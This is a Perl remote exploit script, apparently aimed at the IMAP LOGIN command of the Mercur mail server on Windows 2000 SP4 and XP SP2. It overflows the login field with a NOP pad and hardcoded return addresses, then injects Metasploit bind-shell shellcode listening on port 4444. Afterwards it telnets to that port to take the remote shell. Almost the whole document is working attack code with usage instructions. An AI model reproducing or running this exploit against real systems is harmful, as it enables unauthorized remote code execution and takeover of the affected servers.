#!/usr/bin/perl # Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version # Perl script based on Sami FTP server remote exploit by Critical Security # http://www.securityfocus.com/bid/17138 # acaro [at] jervus.it use IO::Socket::INET; use Switch; if (@ARGV < 2) { print "--------------------------------------------------------------------\n"; print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n"; print " Return address: \n"; print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n"; print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n"; print " If values not specified, Windows 2k Sp4 will be used.\n"; print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n"; print "--------------------------------------------------------------------\n"; } my $host = "127.0.0.1"; my $port = 143; my $reply; my $request; my $pad = "\x90"x268; my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4 foreach (@ARGV) { $host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); $eip = $1 if ($_=~/-o(.*)/); } switch ($eip) { case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version } #Metasploit bind 4444 shellcode my $shellcode= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" . "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" . "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" . "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" . "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" . "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" . "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" . "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" . "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" . "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" . "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" . "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" . "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" . "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" . "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" . "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" . "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" . "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" . "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" . "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" . "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" . "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" . "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" . "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" . "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" . "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n"; send $socket, $exploit, 0; print "[+] sending 1st chunk\n"; $exploit = "a001 LOGIN " . $pad. $eip ."\r\n"; send $socket, $exploit, 0; print "[+] sending 2nd chunk\n"; print " + connecting port 4444 of $host ...\n"; system("telnet $host 4444"); close $socket; exit;